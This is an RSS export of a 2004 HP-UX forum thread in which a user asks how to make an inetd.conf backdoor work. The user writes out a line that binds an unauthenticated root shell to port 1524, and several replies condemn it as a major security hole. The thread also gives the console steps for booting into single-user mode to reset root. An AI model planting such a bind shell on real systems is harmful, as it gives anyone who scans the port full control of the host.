<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: inetd.conf in Operating System - HP-UX</title>
    <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421543#M204276</link>
    <description>thank everyone replay my post&lt;BR /&gt;now i answer the question&lt;BR /&gt;&lt;BR /&gt;why why why?&lt;BR /&gt;&lt;BR /&gt;i wanna open a backdoor in this machine~&lt;BR /&gt;&lt;BR /&gt;but i dont know how to do&lt;BR /&gt;&lt;BR /&gt;note: this machin belong to me&lt;BR /&gt;      not belong to any other one~&lt;BR /&gt;&lt;BR /&gt;who can help me &lt;BR /&gt;mailto:vulgatecn@msn.com&lt;BR /&gt;thank u~&lt;BR /&gt;</description>
    <pubDate>Sun, 14 Nov 2004 23:09:57 GMT</pubDate>
    <dc:creator>vulgate_1</dc:creator>
    <dc:date>2004-11-14T23:09:57Z</dc:date>
    <item>
      <title>inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421539#M204272</link>
      <description>i wanna add a backdoor in my hp unix .&lt;BR /&gt;oneway is:&lt;BR /&gt;&lt;BR /&gt;add one line (below) into inetd.conf &lt;BR /&gt;&lt;BR /&gt;ingreslock stream tcp nowait root /bin/sh sh -i &lt;BR /&gt;&lt;BR /&gt;this function is when system startup&lt;BR /&gt;then start a network service at port 1524(ingreslock was defined in /etc/services,if the file dont include it ,u can add it)&lt;BR /&gt;&lt;BR /&gt;kill inetd and startup inetd&lt;BR /&gt;&lt;BR /&gt;command:&lt;BR /&gt;telnet ip 1524 &lt;BR /&gt;&lt;BR /&gt;now u have a root shell~&lt;BR /&gt;&lt;BR /&gt;but my problem is:&lt;BR /&gt;cant remove the prompt ' ^M '&lt;BR /&gt;&lt;BR /&gt;i look up it via google,&lt;BR /&gt;the result is&lt;BR /&gt;if which u add like that&lt;BR /&gt;&lt;BR /&gt;ingreslock stream tcp nowait root /bin/sh &lt;BR /&gt;&lt;BR /&gt;the system whill prompt&lt;BR /&gt;^M&lt;BR /&gt;&lt;BR /&gt;but like  &lt;BR /&gt;&lt;BR /&gt;ingreslock stream tcp nowait root /bin/sh &lt;BR /&gt;sh -i &lt;BR /&gt;&lt;BR /&gt;all is ok~&lt;BR /&gt;&lt;BR /&gt;why ,why ,why?&lt;BR /&gt;&lt;BR /&gt;reference &lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://project.honeynet.org/scans/scan20/sol/1/" target="_blank"&gt;http://project.honeynet.org/scans/scan20/sol/1/&lt;/A&gt;</description>
      <pubDate>Sat, 13 Nov 2004 09:06:03 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421539#M204272</guid>
      <dc:creator>vulgate_1</dc:creator>
      <dc:date>2004-11-13T09:06:03Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421540#M204273</link>
      <description>Sorry - don't know how to fix your issue - but I have a question for you - why on earth would you do this???&lt;BR /&gt;&lt;BR /&gt;Talk about a major security breach!&lt;BR /&gt;&lt;BR /&gt;I pray your server isn't on the internet - cause just about every hacker in the known universe knows that back door....&lt;BR /&gt;&lt;BR /&gt;There's no need for a back door - ever...if you tried that at just about any security aware company - they would fire you....&lt;BR /&gt;&lt;BR /&gt;You should install Bastille:&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://www.software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6849AA" target="_blank"&gt;http://www.software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6849AA&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Sat, 13 Nov 2004 10:51:54 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421540#M204273</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2004-11-13T10:51:54Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421541#M204274</link>
      <description>Hi,&lt;BR /&gt;&lt;BR /&gt;'sh -i' tells how 'sh' is to be executed. Moreover I am not sure if  it is even going to work if you don't specify the arguments on HP-UX implementation (your first attempt). Shell  gives prompt only if it is executed with -i option or if it has a tty associated. 'man sh-posix'. It's not designed to run through inetd unlike telnetd/ftpd etc., So, I am not sure if you are going to get 'full' shell capabilities. &lt;BR /&gt;&lt;BR /&gt;As said before, my question back to you is 'why, why, why' would you want to configure it that way intentionally?. The first thing any hacker would do is to 'scan' through all the open ports and connect to them to see if they get any response. And this is a red carpet to them.&lt;BR /&gt;&lt;BR /&gt;-Sri</description>
      <pubDate>Sun, 14 Nov 2004 01:20:19 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421541#M204274</guid>
      <dc:creator>Sridhar Bhaskarla</dc:creator>
      <dc:date>2004-11-14T01:20:19Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421542#M204275</link>
      <description>That is a Solaris doc as I'm sure you are aware. It may create a stable back door on a Solaris machine, but more likely will create a whole big enough for a M1A2 Abrahms tank to drive through.&lt;BR /&gt;&lt;BR /&gt;I'm glad it isn't working on HP-UX.&lt;BR /&gt;&lt;BR /&gt;This kind of thing should not work, not should it be tried.&lt;BR /&gt;&lt;BR /&gt;I can tell you a dozen safe ways to create a backdoor for root access on an HP-UX system. They'd be reasonably scure so long as the unpriviledged user with access to them had a complex password and didn't share.&lt;BR /&gt;&lt;BR /&gt;Tell me what you are trying to accomplish and I may post further relavent advice.&lt;BR /&gt;&lt;BR /&gt;SEP</description>
      <pubDate>Sun, 14 Nov 2004 03:15:34 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421542#M204275</guid>
      <dc:creator>Steven E. Protter</dc:creator>
      <dc:date>2004-11-14T03:15:34Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421543#M204276</link>
      <description>thank everyone replay my post&lt;BR /&gt;now i answer the question&lt;BR /&gt;&lt;BR /&gt;why why why?&lt;BR /&gt;&lt;BR /&gt;i wanna open a backdoor in this machine~&lt;BR /&gt;&lt;BR /&gt;but i dont know how to do&lt;BR /&gt;&lt;BR /&gt;note: this machin belong to me&lt;BR /&gt;      not belong to any other one~&lt;BR /&gt;&lt;BR /&gt;who can help me &lt;BR /&gt;mailto:vulgatecn@msn.com&lt;BR /&gt;thank u~&lt;BR /&gt;</description>
      <pubDate>Sun, 14 Nov 2004 23:09:57 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421543#M204276</guid>
      <dc:creator>vulgate_1</dc:creator>
      <dc:date>2004-11-14T23:09:57Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421544#M204277</link>
      <description>You can use ssh or telnet :)&lt;BR /&gt;If you want you can change  Well know port.&lt;BR /&gt;Example you can start your ssh on port 1345&lt;BR /&gt;also you can start ssh from /etc/inetd.conf &lt;BR /&gt;</description>
      <pubDate>Mon, 15 Nov 2004 03:08:33 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421544#M204277</guid>
      <dc:creator>Ivajlo Yanakiev</dc:creator>
      <dc:date>2004-11-15T03:08:33Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421545#M204278</link>
      <description>I dont understand, If the system is yours why do you need a back door?  If you are worried about someone hacking in and changing root password and so forth strengthen the systems security dont reduce it.&lt;BR /&gt;&lt;BR /&gt;You also mentioed that this is your system.  This means you take responsibility for all mallicious hacks and problems on the system.&lt;BR /&gt;&lt;BR /&gt;If the system keeps freezing and you need another way in (i.e. telnet) I'd suggest tuning the system such that it does not freeze.  &lt;BR /&gt;&lt;BR /&gt;If you keep getting locked out for what ever reason, dont make it easy for yourself to hack in, make it hard to lock yourself out in the first place.&lt;BR /&gt;&lt;BR /&gt;Tim &amp;amp; his 0.02â ¬ wort</description>
      <pubDate>Mon, 15 Nov 2004 08:08:27 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421545#M204278</guid>
      <dc:creator>Tim D Fulford</dc:creator>
      <dc:date>2004-11-15T08:08:27Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421546#M204279</link>
      <description>Hi,&lt;BR /&gt;&lt;BR /&gt;I will be surprized if anyone posts a 'solution' for you. These forums are intended to fix the stuff not to break. Hacking (whatever you call it) is not encouraged here, that atleast I have seen so far.&lt;BR /&gt;&lt;BR /&gt;-Sri</description>
      <pubDate>Mon, 15 Nov 2004 08:34:26 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421546#M204279</guid>
      <dc:creator>Sridhar Bhaskarla</dc:creator>
      <dc:date>2004-11-15T08:34:26Z</dc:date>
    </item>
    <item>
      <title>Re: inetd.conf</title>
      <link>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421547#M204280</link>
      <description>The back door is simple - if you forget root password, TOC the box, then when it say hit any key to interupt the boot sequence - hit a key.&lt;BR /&gt;&lt;BR /&gt;bo pri&lt;BR /&gt;&lt;BR /&gt;Interact with IPL: Y&lt;BR /&gt;&lt;BR /&gt;ISL&amp;gt; hpux -is&lt;BR /&gt;&lt;BR /&gt;That will take you to single user mode - then you can reset the root pass word.&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Mon, 15 Nov 2004 09:45:53 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-hp-ux/inetd-conf/m-p/3421547#M204280</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2004-11-15T09:45:53Z</dc:date>
    </item>
  </channel>
</rss>

